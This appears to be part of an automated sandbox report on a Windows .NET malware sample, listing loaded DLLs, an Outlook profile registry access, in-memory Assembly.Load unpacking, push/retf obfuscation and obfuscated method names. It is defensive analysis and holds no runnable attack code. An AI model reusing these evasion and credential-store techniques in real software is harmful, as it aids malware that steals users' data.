Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs .Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.56a0000.7.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d9fcdc.1.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs .Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d4f16c.3.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d966c4.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d45b54.2.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_01284779 push ebp; retf 0002h 0_2_0128477A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_012847B1 push esi; retf 0002h 0_2_012847B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_01284659 push edx; retf 0002h 0_2_0128465A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_01289771 pushfd ; retf 0002h 0_2_01289772
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_01289CF1 push eax; retf 0_2_01289CF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_052DC080 pushad ; retf 0_2_052DC081
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_078364AA push esp; iretd 0_2_078364B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_078313D3 push 9BDCB805h; retf 0_2_078313E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Code function: 0_2_0783537A push eax; ret 0_2_0783537D
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe Static PE information: section name: .text entropy: 7.882388794743662
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Rsjwms4Wh8At7jltVf.cs High entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, hnb1mywmKd17dlbrAS.cs High entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, LVNaJWsMIVA7LTLASE.cs High entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, D33N8oUtGVx7cDxPuT.cs High entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, zQyvpDqyxKTxd6tm0NN.cs High entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, ksWtZCxKsl0TxRCTo8.cs High entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, pLwTg0qqY9GrvEoZXIs.cs High entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs High entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, lDlgAUP9SyyXYURNLR.cs High entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, sC7nprRRvT8OJFZjOZ.cs High entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, fSdvMKZMagrtwMm7Ri.cs High entropy of concatenated method names: 'lq2yprocYj', 'nEuyDyGS7y', 'IYryswC2ld', 'nvAy3Hoa8O', 'hRjyJPOISS', 'jDsyeSX940', 'o7iyCsHSMo', 'DnVyR9lYX6', 'DTQyx7NjxD', 'mKPy5h79Hy'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, O9PymkJ3NMlC2399qj.cs High entropy of concatenated method names: 'JKQhsEQCnj', 'o1Ah3VGbtY', 'GAThHYAQtH', 'Enah09bSsm', 'XX6hbdHFie', 'lgehgYG4SG', 'TZAhf0svRZ', 'TJEhckoEtg', 'RcthTZ3osW', 'FO5hjXiRBb'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, pBjySHqM5QnwRNWaSBd.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q9V5qOaeUr', 'h9u5XNVCx7', 'ufn5G8oA96', 'hl95AuUrbM', 'hsu5SjNYox', 'xFD5N7vpyl', 'Skh5Ydgfbf'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, xGB0Wf6bc0bOdc8jTI.cs High entropy of concatenated method names: 'kTtEwQ9SoG', 'kClEM2Olvv', 'OTJynuxQtD', 'jUNybontt7', 'lvTyg7lONl', 'Up9yi4TYcW', 'myLyfre4Cc', 'fSgycK60ak', 'kBRyWA5x19', 'hseyTKO9Er'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, KdpVO0auC752URy1LH.cs High entropy of concatenated method names: 'ToString', 'Po7ejc2CtV', 'Li3e0yrEQ1', 'gqcenHUq3F', 'cTYebFVO9p', 'n2CegR7eyF', 'kTfeiJlr7P', 'jBIefowaER', 'jS7ecR3arw', 'iuMeWWiTPi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, AnptoFjC7pNu1LqbY6.cs High entropy of concatenated method names: 'CxkCFyqNu8', 'tj9CULHR6k', 'ToString', 'jC5CL1HVrm', 'MYdC69JfMJ', 'f0gCy1rBOY', 'pTuCEljQqC', 'NKNCOjgG2b', 'YOeC1GsAfv', 'GMgCKDLHCP'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, qyT5B9fG4eENyHVdsw.cs High entropy of concatenated method names: 'GDqlxlYY4', 'hF5peEa0M', 'o9TDoN5Sa', 'wU4MruruE', 'K6k3fAj0h', 'DvImOJLqB', 'zPRJ50FG9eMejJkPmf', 'xSdN05GCNU8MZjBOu4', 'LtVR8YQni', 'nNH5UoFYi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, ojeKecA3ycAgUvCgAn.cs High entropy of concatenated method names: 'BIix9SCJrv', 'PtdxQIBCLk', 'IYPxdRPe6o', 'J5cxL9cHMs', 'CZAx6rxAZF', 'DFAxEvYZXS', 'VmAxOPV1Wm', 'AjdRYjjrNi', 'K6VRuXW5nW', 'EtMRayGmQ3'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, kIOpWCowqWShKUKAee.cs High entropy of concatenated method names: 'fE5OI5NlLu', 'JfaO6bhCVu', 'PbdOEEUXYB', 'HStO1rReIi', 'FpJOKcMl0A', 'Ae8ESKhqgT', 'xT8ENk6Jhd', 'ISGEY5g6xW', 'Gq6EuAu9tU', 'O17EaNTZyA'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, KSQ07YHqchvMXla9N1.cs High entropy of concatenated method names: 'KKiRLLy6UN', 'HyrR6tuCpv', 'I8FRyKkQtY', 'FLLREStOBv', 'y0gROgqMIT', 'fE7R1G5hdk', 'gYnRKgLSgW', 'eixR7pHk04', 'g1yRFMTaBb', 'qkbRU4rFDr'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Uel8r1lQF2PkteGZrv.cs High entropy of concatenated method names: 'ltB6qcLvY0', 'brs6XHEJGa', 'WxM6GUBM0C', 'vP96AccmpA', 'YcG6SWCc1l', 'ePZ6NA8XmP', 'GaS6YUKp4S', 'ygy6uRCKrX', 'miQ6aI944q', 's4k6o6UxDd'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.56a0000.7.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d9fcdc.1.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Rsjwms4Wh8At7jltVf.cs High entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
